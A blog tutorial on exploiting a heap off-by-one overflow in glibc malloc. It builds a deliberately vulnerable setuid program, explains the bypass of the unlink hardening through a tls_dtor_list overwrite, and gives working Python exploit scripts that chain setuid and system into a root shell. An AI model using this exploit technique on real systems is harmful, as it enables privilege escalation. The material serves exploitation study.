Off-By-One Vulnerability (Heap Based)

Prerequisites:

  1. Off-By-One Vulnerability (Stack Based)
  2. Understanding glibc malloc

VM Setup: Fedora 20 (x86)

What is an off-by-one bug?

As said in this post, copying a source string into a destination buffer could result in an off-by-one error when

  1. Source string length is equal to destination buffer length.

When the source string length is equal to the destination buffer length, the terminating NULL byte gets copied just past the end of the destination buffer. Here, since the destination buffer is located in the heap, that single NULL byte could overwrite the chunk header of the next chunk, and this could lead to arbitrary code execution.

Recap: As said in this post, a heap segment is divided into multiple chunks as per the user's heap memory requests. Each chunk has its own chunk header (represented by malloc_chunk). Structure malloc_chunk contains the following four elements:

  1. prev_size – If the previous chunk is free, this field contains the size of the previous chunk. Otherwise, if the previous chunk is allocated, this field holds the previous chunk’s user data.
  2. size – This field contains the size of this allocated chunk. The last 3 bits of this field contain flag information.
    • PREV_INUSE (P) – This bit is set when previous chunk is allocated.
    • IS_MMAPPED (M) – This bit is set when chunk is mmap’d.
    • NON_MAIN_ARENA (N) – This bit is set when this chunk belongs to a thread arena.
  3. fd – Points to the next chunk in the same bin (only meaningful while the chunk is free).
  4. bk – Points to the previous chunk in the same bin (only meaningful while the chunk is free).
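The field layout above can be illustrated with a small decoder. This is only a sketch in Python 3, assuming the 32-bit little-endian layout used throughout this post; the helper name parse_chunk_header and the sample header bytes are made up for illustration and are not part of glibc.

```python
import struct

PREV_INUSE = 0x1      # P
IS_MMAPPED = 0x2      # M
NON_MAIN_ARENA = 0x4  # N
FLAG_MASK = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA


def parse_chunk_header(raw):
    """Decode the first 16 bytes of a 32-bit little-endian chunk."""
    prev_size, size, fd, bk = struct.unpack("<IIII", raw[:16])
    return {
        "prev_size": prev_size,
        "size": size & ~FLAG_MASK,          # size with the flag bits stripped
        "P": bool(size & PREV_INUSE),
        "M": bool(size & IS_MMAPPED),
        "N": bool(size & NON_MAIN_ARENA),
        "fd": fd,
        "bk": bk,
    }


# Hypothetical header: a 1024 byte chunk whose previous chunk is in use.
example = parse_chunk_header(struct.pack("<IIII", 0, 0x401, 0, 0))
print(example)
```

Note how the flag bits share the size field: the raw value 0x401 decodes to a size of 1024 with only the P bit set.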

Vulnerable Code:

//consolidate_forward.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define SIZE 16

int main(int argc, char* argv[])
{

    int fd = open("./inp_file", O_RDONLY); /* [1] */
    if(fd == -1) {
        printf("File open error\n");
        fflush(stdout);
        exit(-1);
    }

    if(strlen(argv[1])>1020) { /* [2] */
        printf("Buffer Overflow Attempt. Exiting...\n");
        exit(-2);
    }

    char* tmp = malloc(20-4); /* [3] */
    char* p = malloc(1024-4); /* [4] */
    char* p2 = malloc(1024-4); /* [5] */
    char* p3 = malloc(1024-4); /* [6] */

    read(fd,tmp,SIZE); /* [7] */
    strcpy(p2,argv[1]); /* [8] */

    free(p); /* [9] */
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -o consolidate_forward consolidate_forward.c
$sudo chown root consolidate_forward
$sudo chgrp root consolidate_forward
$sudo chmod +s consolidate_forward

NOTE: ASLR is turned off for our demo purposes. If you want to bypass ASLR too, use an information leakage bug or a brute force technique as described in this post.

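Lines [2] and [8] of the above vulnerable code are where the heap based off-by-one overflow could occur. The length check at line [2] allows a source string of up to 1020 bytes, but the destination buffer (‘p2’) is also 1020 bytes long, so strcpy at line [8] writes the terminating NULL byte one byte past its end. Hence a source string of exactly 1020 bytes could lead to arbitrary code execution.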

How arbitrary code execution is achieved?

Arbitrary code execution is achieved when a single NULL byte overwrites the chunk header of the next chunk (‘p3’). When a chunk of size 1020 bytes (‘p2’) is overflown by a single byte, the least significant byte of the next chunk’s (‘p3’) size field gets overwritten with a NULL byte, and not the least significant byte of its prev_size field.

Why does the LSB of size get overwritten instead of the LSB of prev_size?

checked_request2size converts the user requested size into a usable size (internal representation size), since some extra space is needed for storing malloc_chunk and also for alignment purposes. The conversion takes place in such a way that the last 3 bits of the usable size are never set, and hence they are used for storing the flag information P, M and N.

Thus when malloc(1020) gets executed in our vulnerable code, the user request size of 1020 bytes gets converted to ((1020 + 4 + 7) & ~7) = 1024 bytes (internal representation size). The overhead for an allocated chunk of 1020 bytes is only 4 bytes! But for an allocated chunk we need a chunk header of 8 bytes in order to store the prev_size and size information. Thus the first 8 bytes of the 1024 byte chunk are used for the chunk header, which leaves only 1016 (1024-8) bytes for user data instead of 1020 bytes. But as said above in the prev_size definition, if the previous chunk (‘p2’) is allocated, the next chunk’s (‘p3’) prev_size field contains user data. Thus the prev_size field of the chunk (‘p3’) located next to this allocated 1024 byte chunk (‘p2’) holds the remaining 4 bytes of user data. This is the reason why the single NULL byte overwrites the LSB of size instead of prev_size: the 1020 bytes of user data end exactly where p3’s size field begins.
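The size conversion can be checked with a few lines of Python 3. This is a sketch of the request2size arithmetic for 32-bit x86 only, assuming SIZE_SZ = 4, an 8 byte alignment and a minimum chunk size of 16 bytes; it leaves out the overflow checks that checked_request2size performs.

```python
SIZE_SZ = 4                          # sizeof(size_t) on 32-bit x86
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1  # 8 byte alignment -> mask 7
MINSIZE = 16                         # smallest chunk on 32-bit x86
HEADER = 2 * SIZE_SZ                 # prev_size + size


def request2size(req):
    """Convert a user request into the internal chunk size."""
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    return MINSIZE if padded < MINSIZE else padded & ~MALLOC_ALIGN_MASK


for req in (16, 1020):
    chunk = request2size(req)
    inside = chunk - HEADER          # user bytes inside this chunk
    borrowed = SIZE_SZ               # next chunk's prev_size, reused as user data
    print(req, "->", chunk, "usable:", inside + borrowed)
```

For the 1020 byte request this gives a 1024 byte chunk with 1016 bytes inside the chunk plus 4 bytes borrowed from the next chunk’s prev_size field.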

Heap Layout:

NOTE: The attacker data in the above picture will be explained in the “Overwriting tls_dtor_list” section below.

Now getting back to our original question:

How arbitrary code execution is achieved?

Now we know that on an off-by-one error, a single NULL byte overwrites the LSB of the next chunk’s (‘p3’) size field. This single NULL byte overwrite clears the flag information of that chunk (‘p3’), including PREV_INUSE, i.e. the overflown chunk (‘p2’) now appears to be free despite being in the allocated state. This inconsistency drives glibc to unlink a chunk (‘p2’) which is still allocated when the chunk before it (‘p’) gets freed: free(p) tries to consolidate ‘p’ forward with the apparently free ‘p2’.
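The effect of the stray NULL byte can be reproduced on a toy heap. The following Python 3 sketch models only the two neighbouring chunks ‘p2’ and ‘p3’ as a bytearray; the offsets, the helper names toy_strcpy and size_field, and the heap model itself are illustrative assumptions and not glibc code.

```python
import struct

CHUNK_SIZE = 1024          # internal size of malloc(1020) on 32-bit
PREV_INUSE = 0x1
P2 = 0                     # offset of the 'p2' chunk in the toy heap
P3 = P2 + CHUNK_SIZE       # offset of the 'p3' chunk

heap = bytearray(2 * CHUNK_SIZE)
struct.pack_into("<I", heap, P2 + 4, CHUNK_SIZE | PREV_INUSE)
struct.pack_into("<I", heap, P3 + 4, CHUNK_SIZE | PREV_INUSE)


def toy_strcpy(mem, dst, src):
    """Copy src plus its terminator, as strcpy does, with no bounds check."""
    data = src + b"\x00"
    mem[dst:dst + len(data)] = data


def size_field(mem, chunk):
    """Read the raw size field (size plus flag bits) of a chunk."""
    return struct.unpack_from("<I", mem, chunk + 4)[0]


before = size_field(heap, P3)
toy_strcpy(heap, P2 + 8, b"A" * 1020)   # user data starts 8 bytes into the chunk
after = size_field(heap, P3)

print(hex(before), hex(after))
print("p2 looks free:", not (after & PREV_INUSE))
```

The size itself is unchanged, because 1024 has a zero low byte apart from the flag bits; only the flags are cleared.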

As seen in this post, unlinking a chunk which is in the allocated state could lead to arbitrary code execution, since any four byte memory region could be written with the attacker’s data. But in the same post we also saw that the unlink technique became obsolete because glibc got hardened over the years. In particular, because of the “corrupted double linked list” check, arbitrary code execution wasn’t possible.

But in late 2014, Google’s Project Zero team found a way to successfully bypass the “corrupted double linked list” condition by unlinking a large chunk.

Unlink:

#define unlink(P, BK, FD) { 
  FD = P->fd; 
  BK = P->bk;
  // Primary circular double linked list hardening - Run time check
  if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) /* [1] */
   malloc_printerr (check_action, "corrupted double-linked list", P); 
  else { 
   // If we have bypassed the primary circular doubly linked list hardening, the two lines below let us overwrite any 4 byte memory region with arbitrary data.
   FD->bk = BK; /* [2] */
   BK->fd = FD; /* [3] */
   if (!in_smallbin_range (P->size) 
   && __builtin_expect (P->fd_nextsize != NULL, 0)) { 
    // Secondary circular double linked list hardening - Debug assert
    assert (P->fd_nextsize->bk_nextsize == P); /* [4] */
    assert (P->bk_nextsize->fd_nextsize == P); /* [5] */
    if (FD->fd_nextsize == NULL) { 
     if (P->fd_nextsize == P) 
      FD->fd_nextsize = FD->bk_nextsize = FD; 
     else { 
      FD->fd_nextsize = P->fd_nextsize; 
      FD->bk_nextsize = P->bk_nextsize; 
      P->fd_nextsize->bk_nextsize = FD; 
      P->bk_nextsize->fd_nextsize = FD; 
     } 
    } else { 
     // If we have bypassed the secondary circular doubly linked list hardening, the two lines below let us overwrite any 4 byte memory region with arbitrary data.
     P->fd_nextsize->bk_nextsize = P->bk_nextsize; /* [6] */
     P->bk_nextsize->fd_nextsize = P->fd_nextsize; /* [7] */
    } 
   } 
  } 
}

In glibc malloc, the primary circular doubly linked list is maintained by the fd and bk fields of malloc_chunk, while the secondary circular doubly linked list is maintained by the fd_nextsize and bk_nextsize fields of malloc_chunk. It looks like the corrupted double linked list hardening is applied to both the primary (line [1]) and the secondary (lines [4] and [5]) doubly linked lists, but the hardening for the secondary list is only a debug assert statement (and NOT a runtime check like the primary list hardening), which doesn’t get compiled into production builds (at least on Fedora (x86) machines). Thus the secondary circular doubly linked list hardening (lines [4] and [5]) has no significance, which allows us to write arbitrary data to any 4 byte memory region (lines [6] and [7]).

A few things still need to be cleared up, so let’s see in more detail how unlinking a large chunk leads to arbitrary code execution. Since the attacker controls the contents of the large chunk that is about to be unlinked (‘p2’), he overwrites its malloc_chunk elements as said below:

  • fd should point back to the address of this chunk (‘p2’) to pass the primary circular doubly linked list hardening.
  • bk should also point back to the address of this chunk (‘p2’) to pass the primary circular doubly linked list hardening.
  • fd_nextsize should point to free_got_addr - 0x14
  • bk_nextsize should point to system_addr

But lines [6] and [7] require both fd_nextsize and bk_nextsize to point to writable memory, because each line writes through one of the two pointers. fd_nextsize is writable (since it points to free_got_addr - 0x14), but bk_nextsize isn’t writable since it points to system_addr, which belongs to the text segment of libc.so. This problem of needing both fd_nextsize and bk_nextsize to be writable is solved by overwriting tls_dtor_list.
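To see why both pointers must be writable, the two stores at lines [6] and [7] can be written out as plain address arithmetic. This Python 3 sketch assumes the 32-bit field offsets (fd_nextsize at 0x10 and bk_nextsize at 0x14 from the chunk start); TARGET and VALUE are hypothetical placeholder addresses, not real ones.

```python
FD_NEXTSIZE_OFF = 0x10   # offset of fd_nextsize inside a 32-bit malloc_chunk
BK_NEXTSIZE_OFF = 0x14   # offset of bk_nextsize inside a 32-bit malloc_chunk


def unlink_nextsize_writes(fd_nextsize, bk_nextsize):
    """Return the (address, value) pairs stored by lines [6] and [7]."""
    return [
        (fd_nextsize + BK_NEXTSIZE_OFF, bk_nextsize),  # line [6]
        (bk_nextsize + FD_NEXTSIZE_OFF, fd_nextsize),  # line [7]
    ]


TARGET = 0x1000   # hypothetical address we want to overwrite
VALUE = 0x2000    # hypothetical value we want to place there

writes = unlink_nextsize_writes(TARGET - BK_NEXTSIZE_OFF, VALUE)
for address, value in writes:
    print("write", hex(value), "to", hex(address))
```

Line [6] places VALUE at TARGET as intended, but line [7] also stores a pointer at VALUE + 0x10, so VALUE itself has to be an address in writable memory.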

Overwriting tls_dtor_list:

tls_dtor_list is a thread-local variable which holds a list of function pointers to be invoked during exit(). __call_tls_dtors walks through tls_dtor_list and invokes the functions one by one. Thus if we can overwrite tls_dtor_list with a heap address which contains system and system_arg in place of the func and obj fields of dtor_list, system() could be invoked.
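The list walk can be modelled in a few lines. This is a simplified Python 3 sketch, not the glibc implementation: the class DtorEntry and the function call_tls_dtors are illustrative stand-ins, and only the func, obj and next fields of a list element are modelled.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class DtorEntry:
    """Toy stand-in for one list element: a function, its argument, a link."""
    func: Callable[[object], None]
    obj: object
    next: Optional["DtorEntry"] = None


def call_tls_dtors(head):
    """Walk the list from head and call func(obj) for every element."""
    calls = 0
    while head is not None:
        cur = head
        head = cur.next        # advance before calling, then invoke the entry
        cur.func(cur.obj)
        calls += 1
    return calls


log = []
second = DtorEntry(log.append, "second")
first = DtorEntry(log.append, "first", second)
count = call_tls_dtors(first)
print(count, log)
```

Whoever controls the head pointer and the memory it points to therefore controls which functions run at exit and with which argument.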

Thus the attacker now overwrites the malloc_chunk elements of the large chunk that is about to be unlinked (‘p2’) as said below:

  • fd should point back to the address of this chunk (‘p2’) to pass the primary circular doubly linked list hardening.
  • bk should also point back to the address of this chunk (‘p2’) to pass the primary circular doubly linked list hardening.
  • fd_nextsize should point to tls_dtor_list - 0x14
  • bk_nextsize should point to a heap address which contains a dtor_list element.

– The problem of fd_nextsize being writable is solved since tls_dtor_list belongs to a writable segment of libc.so. By disassembling __call_tls_dtors(), the tls_dtor_list address is found to be 0xb7fe86d4.

– The problem of bk_nextsize being writable is solved since it points to a heap address.
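The constants used in the exploit scripts that follow can be cross-checked with simple arithmetic. This Python 3 sketch assumes the heap starts at 0x0804b000, which is inferred from the addresses in the scripts rather than stated in this post, and reuses the 32-bit request2size arithmetic; both would differ on another system.

```python
SIZE_SZ = 4
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1
MINSIZE = 16
HEADER = 2 * SIZE_SZ

HEAP_BASE = 0x0804b000       # assumption: inferred from the scripts' addresses
TLS_DTOR_LIST = 0xb7fe86d4   # address quoted in this post


def request2size(req):
    """Convert a user request into the internal chunk size (32-bit x86)."""
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    return MINSIZE if padded < MINSIZE else padded & ~MALLOC_ALIGN_MASK


# Lay out the four allocations back to back, in allocation order.
chunks = {}
addr = HEAP_BASE
for name, req in [("tmp", 16), ("p", 1020), ("p2", 1020), ("p3", 1020)]:
    chunks[name] = addr
    addr += request2size(req)

fd = bk = chunks["p2"]                      # chunk points back to itself
fd_nextsize = TLS_DTOR_LIST - 0x14          # so line [6] hits tls_dtor_list
dtor_in_p2 = chunks["p2"] + HEADER + 16     # after fd, bk and both nextsize fields
dtor_in_tmp = chunks["tmp"] + HEADER        # start of tmp's user data

for label, value in [("fd/bk", fd), ("fd_nextsize", fd_nextsize),
                     ("dtor element in p2", dtor_in_p2),
                     ("dtor element in tmp", dtor_in_tmp)]:
    print(label, hex(value))
```

Under these assumptions the computed values match the fd, bk, fd_nextsize and bk_nextsize constants hardcoded in the scripts.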

With all this information, let’s write an exploit program to attack the vulnerable binary ‘consolidate_forward’.

Exploit Code:

#!/usr/bin/env python
#exp_try.py
import struct
from subprocess import call

fd = 0x0804b418
bk = 0x0804b418
fd_nextsize = 0xb7fe86c0
bk_nextsize = 0x804b430
system = 0x4e0a86e0
sh = 0x80482ce

#endianness conversion
def conv(num):
 return struct.pack("<I",num)

buf = conv(fd)
buf += conv(bk)
buf += conv(fd_nextsize)
buf += conv(bk_nextsize)
buf += conv(system)
buf += conv(sh)
buf += "A" * 996

print "Calling vulnerable program"
call(["./consolidate_forward", buf])

Executing the above exploit code doesn’t give us a root shell; it gives us a shell running at our own privilege level. Hmmm…

$ python -c 'print "A"*16' > inp_file
$ python exp_try.py 
Calling vulnerable program
sh-4.2$ id
uid=1000(sploitfun) gid=1000(sploitfun) groups=1000(sploitfun),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2$ exit
exit
$

Why wasn’t a root shell obtained?

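/bin/bash drops privileges when the real uid != effective uid. Our binary ‘consolidate_forward’ runs with real uid = 1000 and effective uid = 0. Hence when system() gets invoked, bash drops the privileges since real uid != effective uid. To solve this problem we need to invoke setuid(0) before system(), and since __call_tls_dtors() walks through tls_dtor_list one element at a time, we need to chain setuid() and system() in order to obtain a root shell. The first dtor_list element (setuid, its argument 0, a map pointer and a next pointer) is supplied through inp_file and lands in ‘tmp’; its next pointer leads to the system element placed in ‘p2’.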

Full Exploit Code:

#!/usr/bin/env python
#gen_file.py
import struct

#dtor_list
setuid = 0x4e123e30
setuid_arg = 0x0
mp = 0x804b020
nxt = 0x804b430

#endianness conversion
def conv(num):
 return struct.pack("<I",num)

tst = conv(setuid)
tst += conv(setuid_arg)
tst += conv(mp)
tst += conv(nxt)

print tst
-----------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/env python
#exp.py
import struct
from subprocess import call

fd = 0x0804b418
bk = 0x0804b418
fd_nextsize = 0xb7fe86c0
bk_nextsize = 0x804b008
system = 0x4e0a86e0
sh = 0x80482ce

#endianness conversion
def conv(num):
 return struct.pack("<I",num)

buf = conv(fd)
buf += conv(bk)
buf += conv(fd_nextsize)
buf += conv(bk_nextsize)
buf += conv(system)
buf += conv(sh)
buf += "A" * 996

print "Calling vulnerable program"
call(["./consolidate_forward", buf])

Executing the above exploit code gives us a root shell!

$ python gen_file.py > inp_file
$ python exp.py 
Calling vulnerable program
sh-4.2# id
uid=0(root) gid=1000(sploitfun) groups=0(root),10(wheel),1000(sploitfun) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit
$

Our off-by-one vulnerable code consolidates chunks in the forward direction; similarly, chunks can also be consolidated in the backward direction. Off-by-one vulnerable code which consolidates chunks in the backward direction can also be exploited.

2 thoughts on “Off-By-One Vulnerability (Heap Based)”

  1. Hello, sploitfun~:)
    First of all, thank you for the great article.

    I have a question. I followed this document (off-by-one-vulnerability(heap-based)),
    but I don’t know how to disassemble __call_tls_dtors() to find the tls_dtor_list address.

    I tried to disassemble __call_tls_dtors() in the consolidate_forward binary (the vulnerable file above) on my machine (Ubuntu 12.04 32 bit).
    gdb doesn’t know the __call_tls_dtors symbol. How do I disassemble the __call_tls_dtors symbol?
    ================
    (gdb) disas __c
    __check_rhosts_file __ctype32_tolower __ctype_toupper
    __chk_fail __ctype32_toupper __ctype_toupper_loc
    __clone __ctype_b __curbrk
    __close __ctype_b_loc __cxa_at_quick_exit
    __cmsg_nxthdr __ctype_get_mb_cur_max __cxa_atexit
    __confstr_chk __ctype_init __cxa_finalize
    __connect __ctype_tolower __cyg_profile_func_enter
    __ctype32_b __ctype_tolower_loc __cyg_profile_func_exit

    ================

    Could you give me a hint on disassembling __call_tls_dtors() and finding the tls_dtor_list address?

    Thank you for reading my message. Have a good day~
